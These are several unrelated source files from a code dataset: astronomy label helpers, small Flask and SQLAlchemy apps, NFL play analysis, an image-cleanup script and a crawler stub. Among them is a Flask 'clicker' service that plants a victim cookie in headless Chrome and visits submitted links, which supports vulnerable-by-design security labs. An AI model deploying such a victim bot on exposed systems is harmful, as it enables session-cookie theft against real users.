data\n descriptor and the value is the memmapped\n data numpy array\n \"\"\"\n\n data_keys = []\n file_names = []\n for morph in LabelHelper.MORPHOLOGIES:\n for t in [\"mean\", \"var\"]:\n f = os.path.join(out_dir, f\"{morph}_{t}.fits\")\n file_names.append(f)\n data_keys.append(f\"{morph}_{t}\")\n\n FitsHelper.create_file(f, shape, np.float32)\n\n hduls, arrays = FitsHelper.get_files(file_names, mode=\"update\")\n\n return hduls, {k: v for k, v in zip(data_keys, arrays)}\n\n @staticmethod\n def create_rank_vote_files(\n shape: List[int], out_dir: str\n ) -> (List[fits.HDUList], List[np.ndarray]):\n \"\"\"Creates the output fits files for the rank vote morpheus output.\n\n Args:\n shape (List[int]): The shape to use when making the FITS files\n out_dir (str): the directory to place the files in. Will make it\n if it doesn't already exist.\n\n Returns:\n List[fits.HDUList]: for the created files\n Dict(str, np.ndarray): a dictionary where the key is the data\n descriptor and the value is the memmapped\n data numpy array\n \"\"\"\n\n data_keys = []\n file_names = []\n for morph in LabelHelper.MORPHOLOGIES:\n f = os.path.join(out_dir, f\"{morph}.fits\")\n file_names.append(f)\n data_keys.append(morph)\n\n FitsHelper.create_file(f, shape, np.float32)\n\n hduls, arrays = FitsHelper.get_files(file_names, mode=\"update\")\n\n return hduls, {k: v for k, v in zip(data_keys, arrays)}\n\n @staticmethod\n def create_n_file(\n shape: List[int], out_dir: str\n ) -> (List[fits.HDUList], List[np.ndarray]):\n \"\"\"Creates the output fits files for the rank vote morpheus output.\n\n Args:\n shape (List[int]): The shape to use when making the FITS files\n out_dir (str): the directory to place the files in. Will make it\n if it doesn't already exist.\n\n Returns:\n List[fits.HDUList]: for the created files\n Dict(str, np.ndarray): a dictionary where the key is the data\n descriptor and the value is the memmapped\n data numpy array\n \"\"\"\n\n n_path = os.path.join(out_dir, \"n.fits\")\n FitsHelper.create_file(n_path, shape, np.int16)\n hduls, arrays = FitsHelper.get_files([n_path], mode=\"update\")\n\n return hduls, {\"n\": arrays[0]}\n\n\nclass LabelHelper:\n \"\"\"Class to help with label updates.\n\n Class Variables:\n UPDATE_MASK (np.ndarray): the (40, 40) integer array that indicates which\n parts of the output of the model to include in the\n calculations. default: innermost (30,30)\n UPDATE_MASK_N (np.ndarray): the (40, 40) integer array that indicates which\n parts of the count 'n' to udpate. default:\n all (40, 40)\n \"\"\"\n\n MORPHOLOGIES = [\"spheroid\", \"disk\", \"irregular\", \"point_source\", \"background\"]\n\n UPDATE_MASK = np.pad(np.ones([30, 30]), 5, mode=\"constant\").astype(np.int16)\n UPDATE_MASK_N = np.ones([40, 40], dtype=np.int16)\n\n @staticmethod\n def index_generator(dim0: int, dim1: int) -> Iterable[Tuple[int, int]]:\n \"\"\"Creates a generator that returns indices to iterate over a 2d array.\n\n Args:\n dim0 (int): The upper limit to iterate up to for the first dimension\n dim1 (int): The upper limit to iterate up to for the second dimension\n\n Returns:\n A generator that yields indices to iterate over a 2d array with\n shape [dim0, dim1]\n \"\"\"\n for y in range(dim0):\n for x in range(dim1):\n yield (y, x)\n\n @staticmethod\n def windowed_index_generator(dim0: int, dim1: int) -> Iterable[Tuple[int, int]]:\n \"\"\"Creates a generator that returns window limited indices over a 2d array.\n\n THe generator returned by this method will yield the indices for the use\n of a sliding window of size `N_UPDATE_MASK.shape` over a 2d array with\n the size `(dim0, dim1)`.\n\n Args:\n dim0 (int): The upper limit to iterate up to for the first dimension\n dim1 (int): The upper limit to iterate up to for the second dimension\n\n Returns:\n A generator that yields indices to iterate over a 2d array with\n shape [dim0, dim1]\n \"\"\"\n\n window_y, window_x = LabelHelper.UPDATE_MASK_N.shape\n final_y = dim0 - window_y + 1\n final_x = dim1 - window_x + 1\n\n return LabelHelper.index_generator(final_y, final_x)\n\n @staticmethod\n def get_final_map(shape: List[int], y: int, x: int):\n \"\"\"Creates a pixel mapping that flags pixels that won't be updated again.\n\n Args:\n shape (List[int]): the shape of the array that x and y are indexing\n y (int): the current y index\n x (int): the current x index\n\n Returns:\n A list of relative indices that won't be updated again.\n \"\"\"\n final_map = []\n\n end_y = y == (shape[0] - LabelHelper.UPDATE_MASK_N.shape[0])\n end_x = x == (shape[1] - LabelHelper.UPDATE_MASK_N.shape[1])\n\n if end_y and end_x:\n for _y in range(5, 35):\n for _x in range(5, 35):\n final_map.append((_y, _x))\n else:\n if end_x:\n final_map.extend([(5, _x) for _x in range(5, 35)])\n if end_y:\n final_map.extend([(_y, 5) for _y in range(5, 35)])\n\n if not final_map:\n final_map.append((5, 5))\n\n return final_map\n\n @staticmethod\n def iterative_mean(\n n: np.ndarray, curr_mean: np.ndarray, x_n: np.ndarray, update_mask: np.ndarray\n ):\n \"\"\"Calculates the mean of collection in an online fashion.\n\n The values are calculated using the following equation:\n http://people.ds.cam.ac.uk/fanf2/hermes/doc/antiforgery/stats.pdf, eq. 4\n\n Args:\n n (np.ndarray): a 2d array containing the number of terms in mean so\n far,\n prev_mean (np.ndarray): the current calculated mean.\n x_n (np.ndarray): the new values to add to the mean\n update_mask (np.ndarray): a 2d boolean array indicating which\n indices in the array should be updated.\n\n Returns:\n An array with the same shape as the curr_mean with the newly\n calculated mean values.\n \"\"\"\n _n = n.copy()\n _n[_n == 0] = 1\n return curr_mean + ((x_n - curr_mean) / _n * update_mask)\n\n @staticmethod\n def iterative_variance(\n prev_sn: np.ndarray,\n x_n: np.ndarray,\n prev_mean: np.ndarray,\n curr_mean: np.ndarray,\n update_mask: np.ndarray,\n ):\n \"\"\"The first of two methods used to calculate the variance online.\n\n This method specifically calculates the $S_n$ value as indicated in\n equation 24 from:\n\n http://people.ds.cam.ac.uk/fanf2/hermes/doc/antiforgery/stats.pdf\n\n Args:\n prev_sn (np.ndarray): the $S_n$ value from the previous step\n x_n (np.ndarray): the current incoming values\n prev_mean (np.ndarray): the mean that was previously calculated\n curr_mean (np.ndarray): the mean, including the current values\n update_mask (np.ndarray): a boolean mask indicating which values to\n update\n\n Returns:\n An np.ndarray containg the current value for $S_n$\n\n\n \"\"\"\n return prev_sn + ((x_n - prev_mean) * (x_n - curr_mean) * update_mask)\n\n @staticmethod\n def finalize_variance(\n n: np.ndarray, curr_sn: np.ndarray, final_map: List[Tuple[int, int]]\n ):\n \"\"\"The second of two methods used to calculate the variance online.\n\n This method calculates the final variance value using equation 25 from\n\n http://people.ds.cam.ac.uk/fanf2/hermes/doc/antiforgery/stats.pdf\n\n but without performing the square root.\n\n Args:\n n (np.ndarray): the current number of values included in the calculation\n curr_sn (np.ndarray): the current $S_n$ values\n final_map List[(y, x)]: a list of indices to calculate the final\n variance for\n\n Returns:\n A np.ndarray with the current $S_n$ values and variance values for\n all indices in final_map\n \"\"\"\n final_n = np.ones_like(n)\n for y, x in final_map:\n final_n[y, x] = n[y, x]\n\n return curr_sn / final_n\n\n @staticmethod\n def iterative_rank_vote(\n x_n: np.ndarray, prev_count: np.ndarray, update_mask: np.ndarray\n ):\n \"\"\"Calculates the updated values for the rank vote labels for a one class.\n\n Args:\n x_n (np.ndarray): the current rank vote values for the class being\n updated\n prev_count (np.ndarray): the array containing the running totals,\n should be shaped as [labels, height, width]\n update_mask (np.ndarray): a boolean array indicating which values to\n update\n\n Returns:\n A numpy array containing the updated count values\n \"\"\"\n update = np.zeros_like(prev_count)\n\n for i in range(update.shape[0]):\n for j in range(update.shape[1]):\n if update_mask[i, j] and (x_n[i, j] == 4):\n update[i, j] = 1\n\n count = prev_count + update\n\n return count\n\n @staticmethod\n def update_ns(data: dict, batch_idx: List[Tuple[int, int]], inc: int = 1) -> None:\n \"\"\"Updates the n values by `inc`.\n\n Args:\n data (dict): a dictionary of numpy arrays containing the data\n batch_idx (List[Tuple[int, int]]): a list of indices to update\n inc (int): the number to increment `n` by. Default=1\n\n Returns\n None\n \"\"\"\n window_y, window_x = LabelHelper.UPDATE_MASK_N.shape\n for y, x in batch_idx:\n ys = slice(y, y + window_y)\n xs = slice(x, x + window_x)\n\n ns = data[\"n\"][ys, xs]\n n_update = LabelHelper.UPDATE_MASK_N * LabelHelper.UPDATE_MASK * inc\n ns = ns + n_update\n data[\"n\"][ys, xs] = ns\n\n @staticmethod\n def update_mean_var(\n data: dict, labels: np.ndarray, batch_idx: List[Tuple[int, int]]\n ):\n \"\"\"Updates the mean and variance outputs with the new model values.\n\n Args:\n data (dict): a dict of numpy arrays containing the data\n labels (np.ndarray): the new output from the model\n batch_idx (List[Tuple[int, int]]): a list of indices to update\n\n Returns:\n None\n \"\"\"\n\n window_y, window_x = LabelHelper.UPDATE_MASK_N.shape\n total_shape = data[\"n\"].shape\n for i, l in enumerate(labels):\n y, x = batch_idx[i]\n LabelHelper.update_ns(data, [(y, x)])\n ys = slice(y, y + window_y)\n xs = slice(x, x + window_x)\n\n final_map = LabelHelper.get_final_map(total_shape, y, x)\n n = data[\"n\"][ys, xs]\n for j, morph in enumerate(LabelHelper.MORPHOLOGIES):\n k_mean = f\"{morph}_mean\"\n k_var = f\"{morph}_var\"\n\n x_n = l[:, :, j]\n prev_mean = data[k_mean][ys, xs]\n prev_var = data[k_var][ys, xs]\n\n mean = LabelHelper.iterative_mean(\n n, prev_mean, x_n, LabelHelper.UPDATE_MASK\n )\n\n var = LabelHelper.iterative_variance(\n prev_var, x_n, prev_mean, mean, LabelHelper.UPDATE_MASK\n )\n var = LabelHelper.finalize_variance(n, var, final_map)\n\n data[k_mean][ys, xs] = mean\n data[k_var][ys, xs] = var\n\n @staticmethod\n def update_rank_vote(\n data: dict, labels: np.ndarray, batch_idx: List[Tuple[int, int]]\n ) -> None:\n \"\"\"Updates the rank vote values with the new output.\n\n Args:\n data (dict): data (dict): a dict of numpy arrays containing the data\n labels (np.ndarray): the new output from the model\n batch_idx (List[Tuple[int, int]]): a list of indices to update\n\n Returns:\n None\n \"\"\"\n\n window_y, window_x = LabelHelper.UPDATE_MASK_N.shape\n for i, l in enumerate(labels):\n y, x = batch_idx[i]\n ys = slice(y, y + window_y)\n xs = slice(x, x + window_x)\n\n ranked = l.argsort().argsort()\n for j, morph in enumerate(LabelHelper.MORPHOLOGIES):\n prev_count = data[morph][ys, xs]\n\n count = LabelHelper.iterative_rank_vote(\n ranked[:, :, j], prev_count, LabelHelper.UPDATE_MASK\n )\n\n data[morph][ys, xs] = count\n\n @staticmethod\n def update_labels(\n data: dict, labels: np.ndarray, batch_idx: List[Tuple[int, int]], out_type: str\n ) -> None:\n \"\"\"Updates the running total label values with the new output values.\n\n Args:\n data (dict): data (dict): a dict of numpy arrays containing the data\n labels (np.ndarray): the new output from the model\n batch_idx (List[Tuple[int, int]]): a list of indices to update\n out_type (str): indicates which type of output to update must be\n one of ['mean_var', 'rank_vote', 'both']\n\n Returns:\n None\n \"\"\"\n\n if out_type == \"mean_var\":\n LabelHelper.update_mean_var(data, labels, batch_idx)\n elif out_type == \"rank_vote\":\n LabelHelper.update_ns(data, batch_idx)\n LabelHelper.update_rank_vote(data, labels, batch_idx)\n else:\n LabelHelper.update_mean_var(data, labels, batch_idx)\n LabelHelper.update_rank_vote(data, labels, batch_idx)\n\n @staticmethod\n def make_mean_var_arrays(shape: Tuple[int, int]) -> dict:\n \"\"\"Create output arrays for use in in-memory classification.\n\n Args:\n shape (Tuple[int]): The 2d (width, height) for to create the arrays\n\n Returns\n A dictionary with keys being the arrays description and values being\n the array itself\n \"\"\"\n\n arrays = {}\n\n for morph in LabelHelper.MORPHOLOGIES:\n for t in [\"mean\", \"var\"]:\n arrays[f\"{morph}_{t}\"] = np.zeros(shape, dtype=np.float32)\n\n return arrays\n\n @staticmethod\n def make_rank_vote_arrays(shape: Tuple[int, int]) -> dict:\n \"\"\"Create output arrays for use in in-memory classification.\n\n Args:\n shape (Tuple[int]): The 2d (width, height) for to create the arrays\n\n Returns\n A dictionary with keys being the arrays description and values being\n the array itself\n \"\"\"\n shape = [shape[0], shape[1]]\n arrays = {}\n\n for morph in LabelHelper.MORPHOLOGIES:\n arrays[morph] = np.zeros(shape, dtype=np.float32)\n\n return arrays\n\n @staticmethod\n def make_n_array(shape: Tuple[int, int]) -> dict:\n \"\"\"Create an output array for use in in-memory classification.\n\n Args:\n shape (Tuple[int]): The 2d (width, height) for to create the arrays\n\n Returns\n A dictionary with keys being the arrays description and values being\n the array itself\n \"\"\"\n return {\"n\": np.zeros(shape, dtype=np.int16)}\n\n @staticmethod\n def finalize_rank_vote(data: dict) -> None:\n \"\"\"Finalize the rank vote by dividing by n.\n\n Args:\n data (dict): a dict of numpy arrays containing the data\n\n TODO: Refactor to accommodate large files\n\n Returns:\n None\n \"\"\"\n\n n = data[\"n\"]\n\n for morph in LabelHelper.MORPHOLOGIES:\n m = data[morph].copy()\n m = np.divide(m, n, out=np.zeros_like(m, dtype=np.float32), where=n != 0)\n data[morph][:, :] = m[:, :]\n","repo_name":"morpheus-project/morpheus","sub_path":"morpheus/core/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":23681,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"54"} +{"seq_id":"36993739442","text":"from flask import Flask, render_template, url_for, request, redirect\nfrom students import Students\nfrom flask_modus import Modus\n\napp = Flask(__name__)\nmodus = Modus(app)\n\nstudents_list = []\n\n\n@app.route('/')\ndef root():\n return redirect(url_for('index'))\n\n\n@app.route('/students', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n new_student = Students(request.form['first_name'], request.form['last_name'])\n students_list.append(new_student)\n return redirect(url_for('index'))\n return render_template('index.html', students=students_list)\n\n\n@app.route('/students/new')\ndef new():\n return render_template('new.html')\n\n\n@app.route('/students/', methods=['GET','PATCH', 'DELETE'])\ndef find(id):\n student = [student for student in students_list if student.id == id][0]\n if request.method == b'PATCH':\n student.first_name = request.form['first_name']\n student.last_name = request.form['last_name']\n return redirect(url_for('index'))\n if request.method == b'DELETE':\n students_list.remove(student)\n return redirect(url_for('index'))\n return render_template('find.html', student=student)\n\n\n@app.route('/students//edit')\ndef edit_user(id):\n student = [student for student in students_list if student.id == id][0]\n return render_template('edit.html', student=student)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"dragosbus/rithmschool-flask","sub_path":"introduction/lecture/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19886385975","text":"from typing import List\n\nfrom .database import SessionLocal\nfrom model.book import DbBook\nfrom view_model.book import Book as Book\n\n\nclass BookCtl:\n\n @classmethod\n def create_book(cls, book: Book):\n book = DbBook(**book.dict())\n session = SessionLocal()\n try:\n session.add(book)\n session.commit()\n finally:\n session.close()\n return {\"code\": 200}\n\n @classmethod\n def update_book(cls, book: Book):\n session = SessionLocal()\n try:\n book_for_update: DbBook = session.query(DbBook).filter(DbBook.id == book.id).first()\n if book_for_update is None:\n return {\"code\": 204}\n else:\n book_for_update.title = book.title\n book_for_update.wordNum = book.wordNum\n book_for_update.author_id=book.author_id\n session.commit()\n return {\"code\": 200}\n finally:\n session.close()\n\n @classmethod\n def get_book(cls, id: int):\n session = SessionLocal()\n try:\n book = session.query(DbBook).filter(DbBook.id == id).first()\n finally:\n session.close()\n if book is None:\n return {}\n else:\n return Book(id=book.id, title=book.title, wordNum=book.wordNum, author_id=book.author_id)\n\n # 支持分页查询,page是页码,从0开始,page_size为每页记录数\n @classmethod\n def get_books(cls, page: int, page_size: int):\n session = SessionLocal()\n l: List[Book] = []\n try:\n books = session.query(DbBook).offset(page * page_size).limit(page_size).all()\n finally:\n session.close()\n for book in books:\n l.append(Book(id=book.id, title=book.title, wordNum=book.wordNum, author_id=book.author_id))\n return l\n\n @classmethod\n def delete_book(cls, id: int):\n session = SessionLocal()\n try:\n rows = session.query(DbBook).filter(DbBook.id == id).delete()\n session.commit()\n finally:\n session.close()\n return rows\n","repo_name":"iyuanfang/studypy","sub_path":"control/book_ctl.py","file_name":"book_ctl.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71993641120","text":"import numpy as np\nimport pandas as pd\nimport scipy as sp\n\nimport matplotlib.pyplot as plt\n\nimport os\nimport glob\n\nclass Game:\n def __init__(self, gameId, opponent, game_info, play_data, location):\n self.gameId = gameId\n self.opponent = opponent\n self.location = location\n self.game_info = game_info\n\n self.play_data = play_data\n\n self.plays = []\n\n @property\n def nPlays(self):\n return len(self.plays)\n\n @property\n def info(self):\n return str(self)\n\n @property\n def numberForwardPassPlays(self):\n count = 0\n for play in self.plays:\n if play.hasForwardPass:\n count += 1\n\n return count\n\n def __str__(self):\n week = self.game_info['week']\n home_team = self.game_info['homeTeamAbbr']\n away_team = self.game_info['visitorTeamAbbr']\n opponent = self.opponent\n date = self.game_info['gameDate'].replace('/','-')\n\n if opponent == home_team:\n return f'Week {week} - {away_team} at {home_team} ({date})'\n elif opponent == away_team:\n return f'Week {week} - {home_team} vs {away_team} ({date})'\n\n def list_plays(self):\n for i in range(len(self.plays)):\n print(f'Play {i+1}: {self.plays[i]}')\n\n def process_plays(self, players):\n for play in self.plays:\n try:\n play.process_players(players)\n if play.hasForwardPass:\n play.find_dropback_events()\n play.process_coverage()\n except:\n print(\"Play Error\")\n print(f'Game ID: {self.gameId} - Play ID: {play.playId}')\n print(play)\n continue\n\n\n def classify_defensive_coverage_shells(self):\n defensive_shells = {}\n defensive_shells['cover 0'] = 0\n defensive_shells['cover 1'] = 0\n defensive_shells['cover 2'] = 0\n defensive_shells['cover 3'] = 0\n defensive_shells['cover 4'] = 0\n defensive_shells['cover 6'] = 0\n\n for play in self.plays:\n if play.hasForwardPass:\n coverage_shell = play.defensive_coverage_shell\n defensive_shells[coverage_shell] += 1\n\n return defensive_shells\n\n def classify_defensive_back_coverages(self, percentage=False, positions=['CB','LB','S'], useId=False):\n\n movement_to_zone_threshold = -0.5\n deep_zone_threshold = 10\n\n coverage_counts = {}\n coverage_names = ('zone','zone-deep','zone-over','man','man-over','blitz')\n \n for play in self.plays:\n \n dbacks = []\n if 'CB' in positions:\n dbacks += play.return_players_by_position('CB')\n if 'LB' in positions:\n dbacks += play.return_linebackers()\n if 'S' in positions:\n dbacks += play.return_safeties()\n \n for dback in dbacks:\n #print(f'Defensive Player Name: {dback.name}')\n if dback.name is None:\n continue\n\n if useId == True:\n player_key = dback.nflId\n else:\n player_key = dback.name\n\n if not player_key in coverage_counts:\n coverage_options = {}\n coverage_options['snaps'] = 0\n for coverage_name in coverage_names:\n coverage_options[coverage_name] = 0\n\n coverage_counts[player_key] = coverage_options\n\n _coverage = dback.coverage\n\n if _coverage is None: # No coverage currently calculated on sacks\n continue\n\n if _coverage == 'zone':\n zone_depth = dback.zone_loc[0] - play.line_of_scrimmage\n\n try:\n movement_to_zone = dback.distance_from_line(play.events['pass_forward']) - dback.distance_from_line(play.events['ball_snap'])\n except:\n continue\n\n if dback.safety_help is None:\n _coverage += '-deep'\n if dback.safety_help == False and zone_depth > deep_zone_threshold and movement_to_zone > movement_to_zone_threshold:\n _coverage += '-deep'\n elif dback.safety_help == True:\n _coverage += '-over'\n \n if _coverage == 'man':\n if dback.safety_help == True:\n _coverage += '-over'\n\n coverage_counts[player_key][_coverage] += 1\n coverage_counts[player_key]['snaps'] += 1\n\n if percentage:\n for counts in coverage_counts.values():\n N = counts['snaps']\n for coverage_name in coverage_names:\n counts[coverage_name] = round(counts[coverage_name] / N,2)\n\n return coverage_counts\n\n def calculate_offensive_production(self, useId=False, verbose=False):\n i = 1\n receiver_data = {}\n for play in self.plays:\n #print(play)\n if play.special_event is not None:\n if verbose:\n print(f'Play {i} Removed for ' + play.special_event[0])\n\n receivers = play.return_receivers()\n\n if verbose:\n print(f'Play {i}')\n\n for rc in receivers:\n\n if rc.name is None:\n continue\n\n if useId == True:\n player_key = rc.nflId\n else:\n player_key = rc.name\n\n if not player_key in receiver_data:\n player_data = {}\n player_data['snaps'] = 0\n player_data['targets'] = 0\n player_data['epa'] = 0\n #player_data['target epa'] = 0\n\n receiver_data[player_key] = player_data\n\n receiver_data[player_key]['snaps'] += 1\n\n try:\n if rc is play.target:\n receiver_data[player_key]['targets'] += 1\n receiver_data[player_key]['epa'] += play.epa\n except:\n if verbose:\n print(play)\n continue\n\n i += 1\n\n return receiver_data\n\n\n ","repo_name":"jhowenstein/nfl-big-data","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71898190241","text":"# Back to the original\n# 증폭을 했는데 다시 되돌리고 싶을 때 쓰는 파일\n# 즉, 48개의 이미지만 제외하고 다 제거하고 싶을 때 사용\n\nfrom natsort import natsorted\nimport os\n\nTRAIN_DIR = 'C:/data/LPD_competition/train'\ntrain_fnames = natsorted(os.listdir(TRAIN_DIR))\n\noriginal_img = ['0.jpg','1.jpg','2.jpg','3.jpg','4.jpg','5.jpg','6.jpg','7.jpg','8.jpg','9.jpg',\\\n '10.jpg','11.jpg','12.jpg','13.jpg','14.jpg','15.jpg','16.jpg','17.jpg','18.jpg','19.jpg',\\\n '20.jpg','21.jpg','22.jpg','23.jpg','24.jpg','25.jpg','26.jpg','27.jpg','28.jpg','29.jpg',\\\n '30.jpg','31.jpg','32.jpg','33.jpg','34.jpg','35.jpg','36.jpg','37.jpg','38.jpg','39.jpg',\\\n '40.jpg','41.jpg','42.jpg','43.jpg','44.jpg','45.jpg','46.jpg','47.jpg']\n\nfor idx, folder in enumerate(train_fnames): # 1000개의 폴더에 대하여\n # if idx >= 1: # 폴더 1개만 시험삼아 해보기\n # break\n\n base_dir = TRAIN_DIR + '/' + folder + '/' # 'C:/data/LPD_competition/train/0/'\n img_lst = natsorted(os.listdir(base_dir))\n print(\"deleting\", idx, \"th folder...\")\n for img in img_lst:\n if img not in original_img:\n os.remove(base_dir + str(img))","repo_name":"biggymart/study","sub_path":"Contest/3_Lotte/mine/1_deaugment_img.py","file_name":"1_deaugment_img.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1014771614","text":"# Service to support vulnerable by design web applications.\n# Flask server receives POST requests and \"clicks\" malicious\n# links with headless chrome browser\n# Probably shouldn't expose this app to public networks\n\n# Form data for POST requests:\n# url: required. URL encoded url to be visited\n# cookie_name: optional. Cookie name to be set for visiting (simulate user)\n# cookie_value: optional. Value for cookie_name. \n\n# Both cookie_name and cookie_value must be received to set the cookie.\n# Otherwise the malicious link will be visited without a cookie set.\n\n# import flask relevant libraries\nfrom urllib.parse import unquote_plus\nfrom flask import Flask\nfrom flask import request\n\n# import selenium relevant libraries\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\n\n# initialize flask app\napp = Flask(__name__)\n\n# initialize headless chrome browser\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\ndriver = webdriver.Chrome(chrome_options=chrome_options)\n\n# Route set to \"/clicker\" to avoid scanners randomly tripping service\n@app.route('/clicker', strict_slashes=False, methods = ['POST'])\ndef clicker():\n \"\"\"Receive URL to click, and make request\"\"\"\n # only accept POST\n if request.method == 'POST':\n data = request.form\n # url var is minimum required to \"click\" malicious link\n if \"url\" in data.keys():\n # url decode incoming url\n target_url = unquote_plus(data['url'])\n # if cookie values are provided, set cookie for malicious \"click\"\n if \"cookie_name\" in data.keys() and \"cookie_value\" in data.keys():\n \n driver.set_page_load_timeout(1)\n \n # selenium can't set a cookie without being \"at\" the domain\n # so we hit a known 404 address, then add the cookie to the session\n driver.get(f\"{target_url}/thisaddressshouldntexist\")\n driver.add_cookie({'name': unquote_plus(data['cookie_name']), 'value': unquote_plus(data['cookie_value'])})\n try:\n # \"Click\" malicious link\n driver.set_page_load_timeout(1)\n driver.get(target_url)\n except TimeoutException as ex:\n isrunning = 0\n return f\"Exception has been thrown. {str(ex)}\"\n\n return \"Done\"\n else:\n return \"This endpoint requires a url parameter.\"\n\n else:\n return \"STATUS 405 - Method Not Allowed\"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"fabraun/clicker-service","sub_path":"clicker/clicker-service.py","file_name":"clicker-service.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14535147462","text":"from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django_mako_plus import view_function\nfrom datetime import datetime\nfrom .. import dmp_render, dmp_render_to_string\nfrom catalog import models as cmod\nfrom django.contrib.auth.decorators import login_required, permission_required\n\nfrom formlib.form import FormMixIn\nfrom django import forms\n\n@view_function\n@permission_required('catalog.change_product')\ndef process_request(request):\n\n try:\n product = cmod.Product.objects.get(id=request.urlparams[0])\n\n except cmod.Product.DoesNotExist:\n return HttpResponseRedirect('/manager/products/')\n\n # process the form\n form = ProductEditForm(request, product=product, initial= {\n 'name': product.name,\n 'category': product.category,\n 'price': product.price,\n 'graphic' : product.graphic,\n #BulkProduct\n 'barcode': getattr(product, 'barcode', 0),\n 'quantity': getattr(product, 'quantity', 0),\n 'reorder_trigger': getattr(product, 'reorder_trigger', 0),\n 'reorder_quantity': getattr(product, 'reorder_quantity', 0),\n #UniqueProduct\n 'serial_number': getattr(product, 'serial_number', 0),\n 'barcode': getattr(product, 'barcode', 0),\n 'condition': getattr(product, 'condition', 0),\n #RentalProduct\n 'is_rented': getattr(product, 'is_rented', 0),\n 'due_date': getattr(product, 'due_date', 0),\n\n })\n if form.is_valid():\n form.commit(product)\n return HttpResponseRedirect('/manager/products/')\n\n context = {\n 'product': product,\n 'form': form,\n }\n\n return dmp_render(request, 'product.html', context)\n\n\n\nclass ProductEditForm(FormMixIn, forms.Form):\n def init(self, product):\n '''Initialize the form (called at end of __init__)'''\n # add fields here\n #Product Fields:\n self.fields['name'] = forms.CharField(label=\"Product Name\", max_length=100)\n self.fields['category'] = forms.ModelChoiceField(label='Category',\n queryset=cmod.Category.objects.order_by('name').all())\n self.fields['price'] = forms.DecimalField(label='Price')\n self.fields['graphic'] = forms.CharField(label='Graphic')\n #BulkProduct Fields:\n if hasattr(product, 'barcode'):\n self.fields['barcode'] = forms.CharField(label='Barcode')\n if hasattr(product, 'quantity'):\n self.fields['quantity'] = forms.IntegerField(label='Quantity')\n if hasattr(product, 'reorder_trigger'):\n self.fields['reorder_trigger'] = forms.IntegerField(label='Reorder Trigger')\n if hasattr(product, 'reorder_quantity'):\n self.fields['reorder_quantity'] = forms.IntegerField(label='Reorder Quantity')\n\n #UniqueProduct Fields:\n if hasattr(product, 'serial_number'):\n self.fields['serial_number'] = forms.CharField(label='Serial Number')\n if hasattr(product, 'condition'):\n self.fields['condition'] = forms.CharField(label='Condition')\n\n #RentalProduct Fields\n if hasattr(product, 'is_rented'):\n self.fields['is_rented'] = forms.BooleanField(label='Is rented', required=False)\n if hasattr(product, 'due_date'):\n self.fields['due_date'] = forms.DateField(label='Due Date', required=False)\n\n\n def commit(self, product):\n '''Process the form action'''\n product.name = self.cleaned_data.get('name')\n product.category = self.cleaned_data.get('category')\n product.price = self.cleaned_data.get('price')\n product.graphic = self.cleaned_data.get('graphic')\n #BulkProduct\n if hasattr(product, 'barcode'):\n product.barcode = self.cleaned_data.get('barcode')\n if hasattr(product, 'quantity'):\n product.quantity = self.cleaned_data.get('quantity')\n if hasattr(product, 'reorder_trigger'):\n product.reorder_trigger = self.cleaned_data.get('reorder_trigger')\n if hasattr(product, 'reorder_quantity'):\n product.reorder_quantity = self.cleaned_data.get('reorder_quantity')\n #UniqueProduct\n if hasattr(product, 'serial_number'):\n product.serial_number = self.cleaned_data.get('serial_number')\n if hasattr(product, 'condition'):\n product.condition = self.cleaned_data.get('condition')\n #RentalProduct\n if hasattr(product, 'is_rented'):\n product.is_rented = self.cleaned_data.get('is_rented')\n if hasattr(product, 'due_date'):\n product.due_date = self.cleaned_data.get('due_date')\n #############\n product.save()\n\n\n\n##################################################################################\n''' DELETING A PRODUCT'''\n\n@view_function\n@permission_required('catalog.delete_product')\ndef delete(request):\n try:\n product = cmod.Product.objects.get(id=request.urlparams[0])\n except cmdo.Product.DoesNotExist:\n return HttpResponseRedirect('/manager/products/')\n\n product.delete()\n return HttpResponseRedirect('/manager/products/')\n","repo_name":"jfed8/MusicStore","sub_path":"fomo/manager/views/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3818722700","text":"import urllib.parse\nfrom usrs_login import Usr_batch_login\nfrom main_crawler import Crawler\nimport imp\nimport sys\nimport time\nfrom sys import argv\nimport os\n\"\"\"\nt = Usr_batch_login(num_usrs=39)\nt.login()\n\n\n\n\"\"\"\ndef compare(d1, d2):\n\tfor i in range(3):\n\t\tif d1[i] > d2[i]:\n\t\t\treturn 1\n\t\telif d1[i] < d2[i]:\n\t\t\treturn -1\n\treturn 0\ndef next(d):\n\tnd = [0, 0, 0]\n\tnd[2] = d[2]+1\n\tif (nd[2] == 32 and d[1] in [1, 3, 5, 7, 8, 10, 12]) or (nd[2] == 31 and d[1] in [4, 6, 9, 11]) or (nd[2] == 30 and d[1] == 2) or (nd[2] == 29 and d[1] == 2 and (d[0]%400 == 0 or (d[0]%4 == 0 and d[0]%100 >0))):\n\t\tnd[2] = 1\n\t\tnd[1] = d[1]+1\n\t\tif nd[1] == 13:\n\t\t\tnd[1] = 1\n\t\t\tnd[0] = d[0]+1\n\t\telse:\n\t\t\tnd[0] = 